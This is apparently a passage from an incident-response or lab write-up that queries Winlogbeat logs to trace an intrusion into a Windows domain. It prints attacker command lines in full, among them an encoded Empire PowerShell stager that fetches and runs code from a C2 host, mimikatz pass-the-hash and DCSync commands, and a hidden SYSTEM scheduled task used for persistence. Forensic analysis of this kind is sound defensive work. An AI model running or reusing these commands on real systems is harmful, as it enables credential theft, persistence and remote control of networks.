  2023-08-30T01:40:38.808Z  allan.smith	6320	2780	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB9AHcAUwAxACYAVgBOAHEAbwBJAFkAKgBHACMANQAtAFAAbAB2AHsAcAAyAGYAPQA0AFoAPwB1AGEAdABAADwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHIAbABrAEgAVgBYAFcAYgBiAD0AMQAzAGMAZgBjAG8AOQByAFUAWAB4ADAAaQA0AEoAMwB4AFQAdQA2ADgAMgBKAEYAaQBYADAAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
  
$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.241.17:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep 6320

  2023-08-30T01:40:38.808Z  allan.smith	6320	2780	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB9AHcAUwAxACYAVgBOAHEAbwBJAFkAKgBHACMANQAtAFAAbAB2AHsAcAAyAGYAPQA0AFoAPwB1AGEAdABAADwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHIAbABrAEgAVgBYAFcAYgBiAD0AMQAzAGMAZgBjAG8AOQByAFUAWAB4ADAAaQA0AEoAMwB4AFQAdQA2ADgAMgBKAEYAaQBYADAAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
  2023-08-30T01:41:34.991Z  allan.smith	5756	6320	"C:\Users\allan.smith\Documents\mimi\x64\mimikatz.exe" "sekurlsa::pth /user:administrator /domain:quicklogistics.org /ntlm:00f80f2538dcb54e7adc715c0e7091ec /run:powershell.exe" exit
  2023-08-30T01:42:47.600Z  allan.smith	4276	6320	"C:\Windows\system32\schtasks.exe" /Create /F /RU system /SC ONIDLE /I 2 /TN Updater /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c \"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKLM:\Software\Microsoft\Network debug).debug)))\""
  2023-08-30T01:43:36.715Z  allan.smith	4464	6320	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ScriptBlock {hostname} -ComputerName DC01.quicklogistics.org"
  2023-08-30T01:43:45.614Z  allan.smith	3100	6320	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ScriptBlock {hostname}"
  2023-08-30T01:43:57.673Z  allan.smith	5096	6320	"C:\Users\allan.smith\Documents\mimi\x64\mimikatz.exe" "sekurlsa::pth /user:administrator /domain:quicklogistics.org /ntlm:00f80f2538dcb54e7adc715c0e7091ec /run:powershell.exe" exit
  2023-08-30T01:45:12.695Z  allan.smith	5156	6320	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ScriptBlock {hostname} -ComputerName DC01.quicklogistics.org"

III. DC01

Confirming the remote executions on DC01 via Invoke-Command, everything went through even including an Empire stager:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.81.59:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)@\(.host.hostname)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep DC01

  2023-08-29T23:50:11.566Z  Administrator@DC01	2656	5944	"C:\Windows\system32\sc.exe" start winlogbeat
  2023-08-30T01:45:02.538Z  Administrator@DC01	6644	1000	C:\Windows\system32\wsmprovhost.exe -Embedding
  2023-08-30T01:45:03.836Z  Administrator@DC01	2556	6644	"C:\Windows\system32\HOSTNAME.EXE"
  2023-08-30T01:45:19.418Z  Administrator@DC01	7152	1000	C:\Windows\system32\wsmprovhost.exe -Embedding
  2023-08-30T01:45:19.629Z  Administrator@DC01	6212	7152	"C:\Windows\system32\HOSTNAME.EXE"
  2023-08-30T01:45:41.086Z  Administrator@DC01	5292	1000	C:\Windows\system32\wsmprovhost.exe -Embedding
  2023-08-30T01:45:41.297Z  Administrator@DC01	4008	5292	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB9AHcAUwAxACYAVgBOAHEAbwBJAFkAKgBHACMANQAtAFAAbAB2AHsAcAAyAGYAPQA0AFoAPwB1AGEAdABAADwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHIAbABrAEgAVgBYAFcAYgBiAD0AMQAzAGMAZgBjAG8AOQByAFUAWAB4ADAAaQA0AEoAMwB4AFQAdQA2ADgAMgBKAEYAaQBYADAAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
  
$ echo "SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AeAB5AD0AWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBEAGUAZgBhAHUAbAB0AFcAZQBiAFAAcgBvAHgAeQA7ACQAdwBjAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQATgBlAHQAdwBvAHIAawBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAOwAkAFMAYwByAGkAcAB0ADoAUAByAG8AeAB5ACAAPQAgACQAdwBjAC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgB5AHQAZQBzACgAJwB9AHcAUwAxACYAVgBOAHEAbwBJAFkAKgBHACMANQAtAFAAbAB2AHsAcAAyAGYAPQA0AFoAPwB1AGEAdABAADwAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAcgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAG8AdQBuAHQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgB4AG8AcgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHIAbABrAEgAVgBYAFcAYgBiAD0AMQAzAGMAZgBjAG8AOQByAFUAWAB4ADAAaQA0AEoAMwB4AFQAdQA2ADgAMgBKAEYAaQBYADAAPQAiACkAOwAkAGQAYQB0AGEAPQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABzAGUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQB0AGEAWwAwAC4ALgAzAF0AOwAkAGQAYQB0AGEAPQAkAGQAYQB0AGEAWwA0AC4ALgAkAGQAYQB0AGEALgBsAGUAbgBnAHQAaABdADsALQBqAG8AaQBuAFsAQwBoAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAGQAYQB0AGEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==" | base64 -d  

  If($PSVersionTable.PSVersion.Major -ge 3){};[System.Net.ServicePointManager]::Expect100Continue=0;$wc=New-Object System.Net.WebClient;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA')));$t='/admin/get.php';$wc.Headers.Add('User-Agent',$u);$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;$Script:Proxy = $wc.Proxy;$K=[System.Text.Encoding]::ASCII.GetBytes('}wS1&VNqoIY*G#5-Plv{p2f=4Z?uat@<');$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};$wc.Headers.Add("Cookie","rlkHVXWbb=13cfco9rUXx0i4J3xTu682JFiX0=");$data=$wc.DownloadData($ser+$t);$iv=$data[0..3];$data=$data[4..$data.length];-join[Char[]](& $R $data ($IV+$K))|IEX                                                                                                                                                                                                                                            

$ echo "aAB0AHQAcAA6AC8ALwBjAGQAbgAuAGIAYQBuAGEAbgBhAHAAZQBlAGwAcABhAHIAdAB5AC4AbgBlAHQAOgA4ADAA" | base64 -d

  http://cdn.bananapeelparty.net:80

The attacker performed a DCSync attack via mimikatz.exe on another Domain Administrator, backupda:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.81.59:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)@\(.host.hostname)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep DC01 | grep 4008

  2023-08-30T01:46:18.577Z  Administrator@DC01	5936	4008	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "iwr https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -outfile mimi.zip"
  2023-08-30T01:46:32.376Z  Administrator@DC01	4164	4008	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Expand-Archive mimi.zip"
  2023-08-30T01:47:34.171Z  Administrator@DC01	4980	4008	"C:\Windows\system32\net.exe" localgroup administrators
  2023-08-30T01:47:57.809Z  Administrator@DC01	6800	4008	"C:\Users\Administrator\Documents\mimi\x64\mimikatz.exe" "lsadump::dcsync /domain:quicklogistics.org /user:backupda" exit
  2023-08-30T01:48:04.117Z  Administrator@DC01	2560	4008	"C:\Users\Administrator\Documents\mimi\x64\mimikatz.exe" "lsadump::dcsync /domain:quicklogistics.org /user:administrator" exit

A callback to the Empire C2 was then established using the Domain Administrator account on both WKSTN-0051 and WKSTN-1327:

$ curl -d "$(cat query.json)" -H 'Content-Type: application/json' -s http://elastic:elastic@10.10.81.59:9200/winlogbeat-7.17.6-2023.08.29-000001/_search?size=3000 | jq -c '.hits.hits[]."_source"' | grep command_line | jq -r '"\(."@timestamp")  \(.user.name)@\(.host.hostname)\t\(.process.pid)\t\(.process.parent.pid)\t\(.process.command_line)"' | sort | grep WKSTN-0051

  2023-08-30T02:06:09.872Z  Administrator@WKSTN-0051	8324	5004	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "Invoke-Command -ComputerName WKSTN-0051.quicklogistics.org -ScriptBlock {powershell -enc SQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoARQB4AHAAZQBjAHQAMQAwADAAQwBvAG4AdABpAG4AdQBlAD0AMAA7ACQAdwBjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEARwBRAEEAYgBnAEEAdQBBAEcASQBBAFkAUQBCAHUAQQBHAEUAQQBiAGcAQgBoAEEASABBAEEAWgBRAEIAbABBAEcAdwBBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgA1AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAE8AZwBBADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAGEAZABtAGkAbgAvAGcAZQB0AC4AcABoAHAAJwA7ACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAEEAZAB